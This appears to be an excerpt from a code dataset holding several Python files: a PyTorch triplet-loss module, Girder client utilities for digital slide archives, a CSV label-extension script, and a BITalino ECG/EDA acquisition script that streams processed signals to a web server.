"132728321", "text": "import torch\nimport torchvision\nimport numpy as np\nimport cv2\nfrom homography_transform import *\nimport torch.nn as nn\nimport torch.nn.functional as F\n\nclass CrossEntropyLoss(torch.nn.Module):\n def __init__(self):\n super(CrossEntropyLoss, self).__init__()\n self.criterion = torch.nn.CrossEntropyLoss(reduction='none').cuda()\n def forward(self, inps, labels, masks=None):\n loss = self.criterion(inps, labels)\n if masks is not None:\n loss = loss * masks\n loss = loss.sum()/masks.sum()\n else:\n loss = loss.mean()\n return loss\n\nclass TripletLossWithGridSample(nn.Module):\n def __init__(self, positive_margin=1.0, negative_margin=0.2, lambda_d=250, grid=8):\n super(TripletLossWithGridSample, self).__init__()\n self.positive_margin = positive_margin\n self.negative_margin = negative_margin\n self.lambda_d = lambda_d\n self.grid = grid\n\n def switch_coord(self, points):\n switched = torch.zeros(points.shape)\n switched[:, 1] = points[:, 0]\n switched[:, 0] = points[:, 1]\n return switched\n\n def grid_sample(self, points, descriptors, H, W):\n switched = self.switch_coord(points)\n switched[:, 0] = (switched[:, 0] / (float(W)/2.)) - 1.\n switched[:, 1] = (switched[:, 1] / (float(H)/2.)) - 1.\n switched = switched.view(1, 1, -1, 2).float().cuda()\n sampled_descriptors = F.grid_sample(descriptors, switched, mode='nearest')\n return sampled_descriptors\n\n\n def forward(self, unwarped_descriptors, warped_descriptors, homography):\n Hc, Wc = unwarped_descriptors.shape[2], unwarped_descriptors.shape[3]\n xs, ys = torch.meshgrid(torch.arange(Hc), torch.arange(Wc))\n coord_cells = torch.cat((xs.unsqueeze(2), ys.unsqueeze(2)), dim=2)\n coord_cells = coord_cells * self.grid + self.grid//2\n coord_cells = coord_cells.reshape(Hc*Wc, 2)\n coord_cells = coord_cells.data.numpy().astype('float')\n coord_cells, warped_cells = warp_pairs(coord_cells, homography, Hc*self.grid, Wc*self.grid)\n coord_cells = torch.from_numpy(coord_cells)\n warped_cells = torch.from_numpy(warped_cells)\n d1 = self.grid_sample(coord_cells, unwarped_descriptors, Hc*self.grid, Wc*self.grid).cuda()\n d2 = self.grid_sample(warped_cells, warped_descriptors, Hc*self.grid, Wc*self.grid).cuda()\n valid_length = coord_cells.shape[0]\n warped_cells = warped_cells.reshape(valid_length, 1, 2).cuda()\n coord_cells = warped_cells.reshape(1, valid_length, 2).cuda()\n cell_dist = torch.norm(coord_cells-warped_cells, dim=-1)\n s = (cell_dist <= (self.grid-0.5)).float()\n D = d1.shape[1]\n d1 = d1.reshape(D, -1)\n d2 = d2.reshape(D, -1)\n dot_dist = d1.t() @ d2\n #s = torch.eye(dot_dist.shape[0]).cuda().float()\n positive_dist = torch.clamp(self.positive_margin - dot_dist, 0, None)\n negative_dist = torch.clamp(dot_dist - self.negative_margin, 0, None)\n loss = self.lambda_d * s * positive_dist + (1-s) * negative_dist\n normalization = float(valid_length * Hc * Wc)\n loss = loss.sum()/normalization\n\n return loss\n", "sub_path": "losses.py", "file_name": "losses.py", "file_ext": "py", "file_size_in_byte": 3234, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "32", "api": [{"api_name": "torch.nn", "line_number": 9, "usage_type": "attribute"}, {"api_name": "torch.nn.CrossEntropyLoss", "line_number": 12, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 12, "usage_type": "attribute"}, {"api_name": "torch.nn.Module", "line_number": 22, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 22, "usage_type": "name"}, {"api_name": "torch.zeros", "line_number": 31, "usage_type": "call"}, {"api_name": "torch.nn.functional.grid_sample", "line_number": 41, "usage_type": "call"}, {"api_name": "torch.nn.functional", "line_number": 41, "usage_type": "name"}, {"api_name": "torch.meshgrid", "line_number": 47, "usage_type": "call"}, {"api_name": "torch.arange", "line_number": 47, "usage_type": "call"}, {"api_name": "torch.cat", "line_number": 48, "usage_type": "call"}, {"api_name": "torch.from_numpy", "line_number": 53, "usage_type": "call"}, {"api_name": "torch.from_numpy", "line_number": 54, "usage_type": "call"}, {"api_name": "torch.norm", "line_number": 60, "usage_type": "call"}, {"api_name": "torch.clamp", "line_number": 67, "usage_type": "call"}, {"api_name": "torch.clamp", "line_number": 68, "usage_type": "call"}]} +{"seq_id": "52615214", "text": "import girder_client\nfrom PIL import Image\nfrom io import BytesIO\nimport numpy as np\nfrom math import ceil\nfrom imageio import imwrite\nfrom json import dumps\n\nAPI_URLS = dict(\n CB='http://computablebrain.emory.edu:8080/api/v1',\n Transplant='http://transplant.digitalslidearchive.emory.edu:8080/api/v1',\n Candygram='http://candygram.neurology.emory.edu:8080/api/v1'\n)\n\n\ndef get_user_by_id(gc, user_id):\n \"\"\"Get DSA user info from user id.\n\n Parameters\n ----------\n gc : girder_client.GirderClient\n authenticated client\n user_id : str\n DSA id of user\n\n Return\n ------\n user : str\n DSA user information\n\n \"\"\"\n user = gc.get(f'user/{user_id}')\n return user\n\n\ndef login(api_url=None, username=None, password=None, dsa=None):\n \"\"\"Login to a girder client session.\n\n Parameters\n ----------\n api_url : str, optional\n DSA instance to use (hint: url ends with api/v1 most of the time), will be ignored if dsa is not None\n username : str, optional\n if both username and password are given, then client is authenticated non-interactively\n password : str, optional\n if both username and password are given, then client is authenticated non-interactively\n dsa : str, optional\n alternative to the api_url parameters, pass in CB for computablebrain, Transplant for transplant, candygram for\n candygram\n\n Returns\n -------\n gc : girder_client.GirderClient\n authenticated instance\n\n \"\"\"\n if dsa is not None:\n try:\n api_url = API_URLS[dsa]\n except KeyError:\n raise Exception('dsa key not found: {}'.format(dsa))\n elif api_url is None:\n raise Exception(\"api_url and dsa parameters can't both be None\")\n\n gc = girder_client.GirderClient(apiUrl=api_url)\n\n if username is not None and password is not None:\n gc.authenticate(username=username, password=password)\n else:\n gc.authenticate(interactive=True)\n return gc\n\n\ndef get_item_image(gc, item_id, image_type, width=256, return_type='PIL'):\n \"\"\"Get an associated image for a large image compatible item (thumbnail, label, macro)\n\n Parameters\n ----------\n gc : girder_client.GirderClient\n instance of girder client\n item_id : str\n item id\n image_type : str\n the associated image to get, options include thumbnail, label, macro\n width : int (optional)\n the width of the returned image, the height will be adjusted to keep the original aspect ratio\n return_type : str (optional)\n return type of the image, either 'PIL' or 'Array' for numpy array\n\n Return\n ------\n image : PIL image\n RGB image\n\n \"\"\"\n url = 'item/{}/tiles/images/{}?width={}&encoding=JPEG'\n\n content = gc.get(url.format(item_id, image_type, width), jsonResp=False).content\n image = Image.open(BytesIO(content))\n\n if return_type == 'Array':\n image = np.array(image)\n elif return_type != 'PIL':\n print('could not recognize return_type {}, returning in PIL format'.format(return_type))\n return image\n\n\ndef get_recursive_items(gc, parent_id, parent_type='folder'):\n \"\"\"Get all items under a folder or collection, recursively. Note that this will not work for virtual folders.\n\n Parameters\n ---------\n gc: girder_client.GirderClient\n an authenticated girder client session\n parent_id: str\n DSA id for parent folder to recursively search for items\n parent_type: str (Default: 'folder')\n set to 'collection' if the parent_id is a collection\n\n Returns\n -------\n items : list\n DSA items found under parent folder/collection\n\n \"\"\"\n items = gc.get('resource/{}/items?type={}&limit=0&sort=_id&sortdir=1'.format(parent_id, parent_type))\n return items\n\n\ndef get_region_im(gc, item_id, region):\n \"\"\"Get a region of a DSA WSI image item as a numpy array. You can get a thumbnail of the image by not specifying\n left, top, bottom, or right in the region parameters but providing a magnification parameter.\n\n Parameters\n ----------\n gc : girder_client.GirderClient\n authenticated client\n item_id : str\n item id\n region : dict\n {'left': int, 'right': int, 'bottom': int, 'top': int, 'width': int, 'height': int, 'magnification' float or\n int}. You only need to give width and height OR right and bottom. If all four are given the right and bottom\n will be ignored and a new right and bottom will obtained from left + width and top + height. If magnification\n is not given the native magnification will be used.\n\n Return\n ------\n im : numpy.ndarray\n RGB(A) region image\n\n \"\"\"\n # if width and height is given then get the right and bottom coordinates\n if 'width' in region and 'height' in region:\n region['right'] = region['left'] + region['width']\n region['bottom'] = region['top'] + region['height']\n\n if 'magnification' not in region:\n region['magnification'] = gc.get('item/{}/tiles'.format(item_id))['magnification']\n\n if 'right' not in region and 'left' not in region and 'top' not in region and 'bottom' not in region:\n url = 'item/{}/tiles/region?units=base_pixels&magnification={}&exact=false&encoding=PNG&jpegQuality=' \\\n '100&jpegSubsampling=0'\n content = gc.get(url.format(item_id, region['magnification']), jsonResp=False).content\n else:\n url = 'item/{}/tiles/region?left={}&top={}&right={}&bottom={}&units=base_pixels&magnification={}' + \\\n '&exact=false&encoding=PNG&jpegQuality=100&jpegSubsampling=0'\n content = gc.get(url.format(item_id, region['left'], region['top'], region['right'], region['bottom'],\n region['magnification']), jsonResp=False).content\n image = np.array(Image.open(BytesIO(content)))\n return image\n\n\ndef image_items_mosaic(gc, items, n_cols=6, im_size=(256, 256), save_path=None):\n \"\"\"Given a list of image item information, either a list of item ids or a list of item dicts, get thumbnails for\n each image and concatentate them into a mosaic of images. The images are all grabbed at the same resolution and\n are padded with white pixels to keep the aspect ratio of original image. The number of rows images is determined\n by the n_cols parameters.\n\n Parameters\n ----------\n gc : girder_client.GirderClient\n authenticated client if working with private images\n items : list\n list of item ids or list of items dicts, both will work\n n_cols : int (optional)\n number of images in each row, will determine how many rows the mosaic will have\n im_size : tuple (optional)\n size of each image, padded with white to preserve aspect ratio\n save_path : str (optional)\n file path with filename used to save the mosaic image to, as PNG or similar format\n\n Return\n ------\n mosaic : np.ndarray\n mosaic image in RGB form (alpha channel will not be maintained)\n\n \"\"\"\n # save n_cols images accros, get the number of rows needed\n n_rows = ceil(len(items) / n_cols)\n\n # create the mosaic array\n mosaic = np.zeros((im_size[0] * n_rows, im_size[1] * n_cols, 3), dtype=np.uint8)\n\n for i, item in enumerate(items):\n # get the thumbnail - pad with white space to conserve apsect ratio\n try:\n content = gc.get('item/{}/tiles/thumbnail?width={}&height={}&fill=%23FFFFFF&encoding=PNG'.format(\n item['_id'], im_size[0], im_size[1]), jsonResp=False).content\n except:\n content = gc.get('item/{}/tiles/thumbnail?width={}&height={}&fill=%23FFFFFF&encoding=PNG'.format(\n item, im_size[0], im_size[1]), jsonResp=False).content\n image = np.array(Image.open(BytesIO(content)))[:, :, :3]\n\n # find location to put image into mosaic array\n mosaic[\n int(i / n_cols) * im_size[0]:int(i / n_cols) * im_size[0] + im_size[0],\n (i % n_cols) * im_size[0]:(i % n_cols) * im_size[0] + im_size[0], :] = image\n\n if save_path is not None:\n # save the image\n imwrite(save_path, mosaic)\n return mosaic\n\n\ndef get_collection_id(gc, collection_name):\n \"\"\"Get the id of a collection by name.\n\n Parameters\n ----------\n gc : girder_client.GirderClient\n authenticated client for private collections\n collection_name : str\n name of collection\n\n Return\n ------\n collection_id : str\n id of the collection, returns None if no collections with given name\n\n \"\"\"\n item_id = None\n for collection in gc.listCollection():\n if collection['name'] == collection_name:\n item_id = collection['_id']\n break\n return item_id\n\n\ndef create_virtual_folder(gc, source_collection_name, target_fld_id, metadata_key):\n \"\"\"Create a virtual folder using single metadata key.\n\n Parameters\n ----------\n gc : girder_client.GirderClient\n authenticated client\n source_collection_name : str\n name of collection to use as source, all items in this collection will be searched to populate the virtual folder\n target_fld_id : str\n id of the virtual folder, must be previously created\n metadata_key : str\n metadata key to use to populate the virtual folder\n\n Return\n ------\n fld_ids : list\n list of created virtual folders\n\n \"\"\"\n # unique values for metadata in source collection\n unique_values = set()\n collection_id = get_collection_id(gc, source_collection_name)\n for item in get_recursive_items(gc, collection_id, parent_type='collection'):\n if 'meta' in item:\n meta = item['meta']\n if metadata_key in meta:\n unique_values.add(meta[metadata_key])\n\n fld_ids = []\n for value in unique_values:\n # set parameters for virtual folder post for this value folder\n params = {\"parentType\": \"folder\", \"parentId\": target_fld_id, \"reuseExisting\": True, \"name\": value,\n \"isVirtual\": True,\n \"virtualItemsQuery\": dumps(\n {\"meta.{}\".format(metadata_key): value, 'baseParentId': {\"$oid\": collection_id}})}\n\n # post the new virtual folder\n fld_ids.append(gc.post(\"folder\", parameters=params)['_id'])\n\n return fld_ids\n", "sub_path": "modules/girder_utils.py", "file_name": "girder_utils.py", "file_ext": "py", "file_size_in_byte": 10340, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "32", "api": [{"api_name": "girder_client.GirderClient", "line_number": 65, "usage_type": "call"}, {"api_name": "PIL.Image.open", "line_number": 99, "usage_type": "call"}, {"api_name": "PIL.Image", "line_number": 99, "usage_type": "name"}, {"api_name": "io.BytesIO", "line_number": 99, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 102, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 169, "usage_type": "call"}, {"api_name": "PIL.Image.open", "line_number": 169, "usage_type": "call"}, {"api_name": "PIL.Image", "line_number": 169, "usage_type": "name"}, {"api_name": "io.BytesIO", "line_number": 169, "usage_type": "call"}, {"api_name": "math.ceil", "line_number": 199, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 202, "usage_type": "call"}, {"api_name": "numpy.uint8", "line_number": 202, "usage_type": "attribute"}, {"api_name": "numpy.array", "line_number": 212, "usage_type": "call"}, {"api_name": "PIL.Image.open", "line_number": 212, "usage_type": "call"}, {"api_name": "PIL.Image", "line_number": 212, "usage_type": "name"}, {"api_name": "io.BytesIO", "line_number": 212, "usage_type": "call"}, {"api_name": "imageio.imwrite", "line_number": 221, "usage_type": "call"}, {"api_name": "json.dumps", "line_number": 283, "usage_type": "call"}]} +{"seq_id": "486894562", "text": "from skimage import io\nimport os\nimport csv\n\nTRAIN_DIR = \"/cluster/academic/CSCI481/fluke_net/kaggle_dataset/train\"\nALL_LABELS_CSV = \"all_train_labels\"\n\nwith open(ALL_LABELS_CSV + \".csv\", newline='') as orig_f:\n orig = csv.DictReader(orig_f)\n fieldnames = orig.fieldnames\n fieldnames.append(\"BW\")\n fieldnames.append(\"W\")\n fieldnames.append(\"H\")\n fieldnames.append(\"AR\")\n with open(ALL_LABELS_CSV + \"_extended.csv\", \"w\", newline='') as out_f:\n out = csv.DictWriter(out_f, fieldnames=fieldnames)\n out.writeheader()\n for row in orig:\n img_path = row['Image']\n image = io.imread(os.path.join(TRAIN_DIR, img_path))\n row[\"BW\"] = (len(image.shape) == 2)\n row[\"W\"] = image.shape[1]\n row[\"H\"] = image.shape[0]\n row[\"AR\"] = float(row[\"W\"])/row[\"H\"]\n out.writerow(row)\n", "sub_path": "label_files/extend_labels.py", "file_name": "extend_labels.py", "file_ext": "py", "file_size_in_byte": 879, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "32", "api": [{"api_name": "csv.DictReader", "line_number": 9, "usage_type": "call"}, {"api_name": "csv.DictWriter", "line_number": 16, "usage_type": "call"}, {"api_name": "skimage.io.imread", "line_number": 20, "usage_type": "call"}, {"api_name": "skimage.io", "line_number": 20, "usage_type": "name"}, {"api_name": "os.path.join", "line_number": 20, "usage_type": "call"}, {"api_name": "os.path", "line_number": 20, "usage_type": "attribute"}]} +{"seq_id": "197529772", "text": "from local_bitalino import BITalino\nimport time,datetime\nimport numpy\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport matplotlib.animation as animation\nimport biosppy as bs # maybe not used!\n\nimport scipy.io as sio\nfrom scipy import signal\nimport scipy\n\nfrom socket import socket\nimport peakutils\nimport configparser\nimport getopt\nimport sys,os\nimport math\n\n\n\nWEB_HOST_ADDRESS = \"\"\nWEB_PORT = 1234\nplot = True\nsend_flag = True\nsave_raw_data = True\n\nlowcut = 30\nhighcut = 200\n\nlabels = [\"'nSeq'\", \"'I1'\", \"'I2'\", \"'O1'\", \"'O2'\", \"'A1'\", \"'A2'\", \"'A3'\", \"'A4'\", \"'A5'\", \"'A6'\"]\n\n# initial settings - default settings\nmacAddress = '20:16:12:22:01:28'\nrunning_time = 30\nbatteryThreshold = 30\nacqChannels = [0,1] # 1 for A2 | 0 - A1\nsamplingRate = 1000\nnSamples = 100\ndigitalOutput =[1,1]\n\n\ndef tostring(data):\n \"\"\"\n :param data: object to be converted into a JSON-compatible `str`\n :type data: any\n :return: JSON-compatible `str` version of `data`\n\n Converts `data` from its native data type to a JSON-compatible `str`.\n \"\"\"\n dtype = type(data).__name__\n if dtype == 'ndarray':\n if numpy.shape(data) != ():\n data = data.tolist() # data=list(data)\n else:\n data = '\"' + data.tostring() + '\"'\n elif dtype == 'dict' or dtype == 'tuple':\n try:\n data = json.dumps(data)\n except:\n pass\n elif dtype == 'NoneType':\n data = ''\n elif dtype == 'str' or dtype == 'unicode':\n data = json.dumps(data)\n\n return str(data)\n\ndef send_to_server(data_as_json):\n '''\n function to send the data to the websocket.\n :param data_as_json:\n :return:\n '''\n #instanciate a socket\n sock = socket()\n\n #connect to the socket\n sock.connect((WEB_HOST_ADDRESS,int(WEB_PORT)))\n\n # send the data as a json\n sock.send(data_as_json.encode('utf-8'))\n\n # close the connection.\n sock.close()\n\ndef butter_bandpass(lowcut, highcut, fs, order=1):\n nyq = 0.5 * fs\n low = lowcut / nyq\n high = highcut / nyq\n b, a = signal.butter(order, [low, high], btype='band')\n return b, a\n\ndef butter_highpass(cutoff, fs, order=1):\n nyq = 0.5 * fs\n normal_cutoff = cutoff / nyq\n b, a = signal.butter(order, normal_cutoff, btype='high', analog=False)\n return b, a\n\ndef getpeak(ecg, time):\n '''detects the peak from the array!'''\n if(len(ecg) < 500):\n return [0]\n else:\n indexes = peakutils.indexes(ecg, thres=0.8 , min_dist=2)\n return indexes\n\n\ndef get_time_domain_features(ecg,peaklist,fs):\n '''\n\n :param ecg: our filtered signal\n :param peaklist: array of indexes which gives th peak\n :param fs: sampling frequency\n :return: ??\n '''\n RR_list = []\n cnt = 0\n while (cnt < (len(peaklist) - 1)):\n RR_interval = (peaklist[cnt + 1] - peaklist[cnt]) # Calculate distance between beats in # of samples\n s_dist = (RR_interval / fs)\n RR_list.append(s_dist) # Append to list\n cnt += 1\n\n hr = 60 / np.mean(RR_list) * 0.1 # 60sec (1 minute) / average R-R interval of signal * (new sample arrives).\n\n\n return hr\n\n\ndef eda_bin_to_microsiemens(eda):\n '''\n Vcc = battery voltage = 3.7 V | Sensor_gain = 1100\n RMOhm = 1 - EDAB / 2^n (sensor resistance in mega ohms)\n EDAS = 1 / RMOhm (conductance in microsiemens)\n Reference : http://forum.bitalino.com/viewtopic.php?f=12&t=128\n\n :param eda: eda array\n :return:\n '''\n # convert binary data to micro siemens\n eda_value_microsiemens = []\n for j in range(0, len(eda)):\n r = 1 - (eda[j] / 1023)\n eda_mSiemens = 1 / r\n eda_value_microsiemens.append(eda_mSiemens)\n\n return eda_value_microsiemens\n\ndef ecg_bin_to_millivolts(ecg):\n '''\n Vcc = battery voltage = 3.7 V | Sensor_gain = 1100\n RMOhm = 1 - EDAB / 2^n (sensor resistance in mega ohms)\n EDAS = 1 / RMOhm (conductance in microsiemens)\n Reference : http://forum.bitalino.com/viewtopic.php?f=12&t=128\n\n :param eda: eda array\n :return:\n '''\n\n ecg_value_millivolts = []\n for i in range(0, len(ecg)):\n x = ecg[i]/1024 - (0.5) * 3.3\n x = x/1100\n x = x * 1000\n ecg_value_millivolts.append(x)\n\n return ecg_value_millivolts\n\n\ndef eda_process(eda):\n pass\n\n\ndef write_to_file(filename,raw_data):\n with open(filename, 'ab') as f:\n for line in raw_data:\n a = numpy.array(line)\n np.savetxt(f, a.reshape(1, a.shape[0]) , delimiter=',' ,fmt=\"%5f\")\n\ndef bitalino_data_collection():\n '''\n The core function of the file.\n :return:\n '''\n\n Fs = float(int(samplingRate))\n\n szplot = 500 # to show the plot (show for last) # our window size!\n\n # Connect to BITalino\n device = BITalino(macAddress)\n print(\"device connected to bitalino\")\n\n # Set battery threshold\n device.battery(batteryThreshold)\n\n\n # Start Acquisition\n device.start(samplingRate, acqChannels)\n\n\n # time initialization\n timeend = 0.0\n timeinit = 0.0 # initial time\n timeend += float(nSamples) / float(samplingRate) # end time ( in our case its 100/1000 = 0.1 sec)\n time_elapsed = []\n\n ecg = []\n eda = []\n peakind = [] # for peak detection\n\n ecg_data = []\n eda_data = []\n\n\n # plotting\n if(plot) :\n fig = plt.figure(figsize=(12, 8), dpi=80, facecolor='w', edgecolor='k')\n ax = fig.add_subplot(111)\n\n plt.ion()\n plt.xlabel('Time (seconds)')\n line0, = ax.plot(time_elapsed, ecg_data, 'y-', label='RAW data') # raw data\n line1, = ax.plot(time_elapsed, ecg, 'b-' , alpha=0.3, label='detrended RAW data') # raw data\n line2, = ax.plot(time_elapsed, ecg, 'g-', alpha=0.7 ,label='filtered data') # to represent teh filtered data\n line3, = ax.plot(time_elapsed, ecg, 'ro' , label='detected peak') # peaks\n fig.show()\n fig.canvas.draw()\n\n\n fig1 = plt.figure(figsize=(12, 8), dpi=80, facecolor='w', edgecolor='k')\n ax_eda = fig1.add_subplot(111)\n plt.ion()\n plt.xlabel('Time (seconds)')\n plt.ylabel('Conductance (microSiemens)')\n line, = ax_eda.plot(time_elapsed, eda, 'r-' , label='eda RAW') # peaks\n lineeda1, = ax_eda.plot(time_elapsed, eda, 'b-', label=' eda filtered') # peaks\n fig1.show()\n fig1.canvas.draw()\n\n\n filename = 'raw_data/recording_'+ str(datetime.datetime.now()) + '.txt'\n\n try:\n # indefinite signal capture\n while 1:\n # read data from the device\n received_data = device.read(nSamples)\n\n if(save_raw_data):\n write_to_file(filename,received_data)\n\n ecg_data = np.concatenate((ecg_data, ecg_bin_to_millivolts(received_data[:, -1])), axis=0)\n eda_data = np.concatenate((eda_data, eda_bin_to_microsiemens(received_data[:, -2])), axis=0)\n\n\n # we detrend the data for heart rate\n ecg = signal.detrend(ecg_data)\n\n # we convert the data from binary to micro siemens.\n eda_raw = eda_data\n\n # highpassfilter for EDA\n ale,ble = butter_highpass(0.05, Fs) # high pass cutoff = 0.05 Hz\n eda = signal.filtfilt(ale, ble, eda_raw);\n\n\n #bandpassfilter for ECG\n ale,ble = butter_bandpass(lowcut, highcut , Fs)\n ecg_filtered = signal.filtfilt(ale, ble, ecg);\n\n\n # update time\n time_elapsed = np.concatenate((time_elapsed, np.linspace(timeinit, timeend, nSamples + 1)[1:]), 0)\n timeinit = time_elapsed[-1]\n timeend += float(nSamples) / float(samplingRate)\n\n\n # update plot everytime you recive the data\n # note that we show the user past 500 data samples and hence data from past 0.5 second = 500 msec(millisec)\n x = time_elapsed[-szplot:]\n y_raw = ecg[-szplot:]\n y_filtered = ecg_filtered[-szplot:]\n\n # we now find peaks for past 0.5 seconds ( R peak detection)\n peakind = getpeak(y_filtered, x) # METHOD 1\n\n\n # some adjustments to plot the data\n x_peaks = [x[i] for i in peakind] # peak time\n y_peaks = [y_filtered[i] for i in peakind] # peak value\n\n\n heart_rate = get_time_domain_features(y_filtered, peakind,Fs)\n\n\n if math.isnan(heart_rate):\n heart_rate= 40\n\n\n if (plot):\n line0.set_data(x, ecg_data[-szplot:])\n line1.set_data(x,y_raw)\n line2.set_data(x, y_filtered)\n line3.set_data(x_peaks,y_peaks)\n # line4.set_data(x_peaks_hamilton, y_peaks_hamilton)\n\n ax.relim()\n ax.autoscale_view()\n fig.canvas.draw()\n ax.legend(loc='upper right',handles=[line0,line1,line2,line3]) # to add the legend.\n plt.draw()\n\n line.set_data(x, eda_raw[-szplot:])\n lineeda1.set_data(x,eda[-szplot:])\n ax_eda.relim()\n ax_eda.autoscale_view()\n fig1.canvas.draw()\n ax_eda.legend(loc='upper right',handles=[line,lineeda1]) # to add the legend.\n plt.draw()\n\n # send data to server as a json\n # note we send the last 500\n #{ \"ecg\" : \"[data]\" ,\n # \"fatures\" = [hr,other?],\n # \"eda\" = \"[eda data]\"\n # }\n ##############################\n data_as_json = \"{ \\\"ecg\\\" : \"\n data_as_json = data_as_json + tostring(y_filtered) + ','\n data_as_json = data_as_json + \" \\\"ecg_features\\\" : \" + str(heart_rate) + '}'\n\n\n # we initially send ecg data\n if send_flag:\n send_to_server(data_as_json)\n\n # prep eda data\n eda_data_as_json = \"{ \\\"eda\\\" : \"\n eda_data_as_json = eda_data_as_json + tostring(eda[-szplot:]) + '}'\n\n if send_flag:\n send_to_server(eda_data_as_json)\n\n print('data sent to the web server...')\n\n except KeyboardInterrupt:\n print(\"Keyboard interupted\")\n # Turn BITalino led on\n device.trigger(digitalOutput)\n # Stop acquisition\n device.stop()\n # Close connection\n device.close()\n\ndef usage(message):\n print(\"\"\"\n\n Usage: pyhton3 collect_data [OPTIONS] -c CONFIGFILE\n\n -c FILENAME, --configfile FILENAME Use FILENAME for configuration\n -h, --help Show help\n \"\"\")\n\n if(message):\n print(\"\\nERROR: \" + message + \"\\n\\n\")\n sys.exit(2)\n\n\ndef main():\n global WEB_HOST_ADDRESS\n global WEB_PORT\n try:\n opts, args = getopt.getopt(sys.argv[1:], \"hc:d\", [\"help\", \"configfile=\"])\n except getopt.GetoptError as err:\n # print help information and exit:\n print(err) # will print something like \"option -a not recognized\"\n usage()\n\n configfile = None\n for o, a in opts:\n if o in (\"-h\", \"--help\"):\n usage()\n elif o in (\"-c\", \"--configfile\"):\n configfile = a\n else:\n assert False, \"unhandled option\"\n\n if(configfile is None):\n usage(\"Missing configfile\")\n if(not os.path.exists(configfile)):\n usage(\"Cannot open file \" + configfile)\n\n # read the config file.\n print(\"Using config file : \" + configfile)\n config = configparser.ConfigParser()\n config.read(configfile)\n\n WEB_HOST_ADDRESS = config.get(\"Server\", \"Listen\")\n WEB_PORT = config.get(\"Server\", \"Port\")\n\n WEB_HOST_ADDRESS = str(WEB_HOST_ADDRESS)\n print(WEB_HOST_ADDRESS, WEB_PORT)\n\n\n print(macAddress,running_time,batteryThreshold,acqChannels,samplingRate,nSamples)\n print(\"data collection process strated\")\n bitalino_data_collection()\n\n\n\nif __name__ == \"__main__\":\n\n main()", "sub_path": "collect_data.py", "file_name": "collect_data.py", "file_ext": "py", "file_size_in_byte": 11867, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "32", "api": [{"api_name": "numpy.shape", "line_number": 53, "usage_type": "call"}, {"api_name": "socket.socket", "line_number": 76, "usage_type": "call"}, {"api_name": "scipy.signal.butter", "line_number": 91, "usage_type": "call"}, {"api_name": "scipy.signal", "line_number": 91, "usage_type": "name"}, {"api_name": "scipy.signal.butter", "line_number": 97, "usage_type": "call"}, {"api_name": "scipy.signal", "line_number": 97, "usage_type": "name"}, {"api_name": "peakutils.indexes", "line_number": 105, "usage_type": "call"}, {"api_name": "numpy.mean", "line_number": 125, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 178, "usage_type": "call"}, {"api_name": "numpy.savetxt", "line_number": 179, "usage_type": "call"}, {"api_name": "local_bitalino.BITalino", "line_number": 192, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 219, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 219, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ion", "line_number": 222, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 222, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 223, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 223, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 232, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 232, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ion", "line_number": 234, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 234, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 235, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 235, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 236, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 236, "usage_type": "name"}, {"api_name": "datetime.datetime.now", "line_number": 243, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 243, "usage_type": "attribute"}, {"api_name": "numpy.concatenate", "line_number": 254, "usage_type": "call"}, {"api_name": "numpy.concatenate", "line_number": 255, "usage_type": "call"}, {"api_name": "scipy.signal.detrend", "line_number": 259, "usage_type": "call"}, {"api_name": "scipy.signal", "line_number": 259, "usage_type": "name"}, {"api_name": "scipy.signal.filtfilt", "line_number": 266, "usage_type": "call"}, {"api_name": "scipy.signal", "line_number": 266, "usage_type": "name"}, {"api_name": "scipy.signal.filtfilt", "line_number": 271, "usage_type": "call"}, {"api_name": "scipy.signal", "line_number": 271, "usage_type": "name"}, {"api_name": "numpy.concatenate", "line_number": 275, "usage_type": "call"}, {"api_name": "numpy.linspace", "line_number": 275, "usage_type": "call"}, {"api_name": "math.isnan", "line_number": 298, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.draw", "line_number": 313, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 313, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.draw", "line_number": 321, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 321, "usage_type": "name"}, {"api_name": "sys.exit", "line_number": 368, "usage_type": "call"}, {"api_name": "getopt.getopt", "line_number": 375, "usage_type": "call"}, {"api_name": "sys.argv", "line_number": 375, "usage_type": "attribute"}, {"api_name": "getopt.GetoptError", "line_number": 376, "usage_type": "attribute"}, {"api_name": "os.path.exists", "line_number": 392, "usage_type": "call"}, {"api_name": "os.path", "line_number": 392, "usage_type": "attribute"}, {"api_name": "configparser.ConfigParser", "line_number": 397, "usage_type": "call"}]} +{"seq_id": "164633444", "text": "from setuptools import setup, find_packages, Extension\nimport os.path\nimport warnings\n\nclassifiers = [\n 'Programming Language :: Python :: 2',\n 'Programming Language :: Python :: 3',\n 'Intended Audience :: Science/Research',\n 'License :: OSI Approved :: MIT License',\n 'Topic :: Scientific/Engineering'\n]\n\nextensions = [Extension(\n 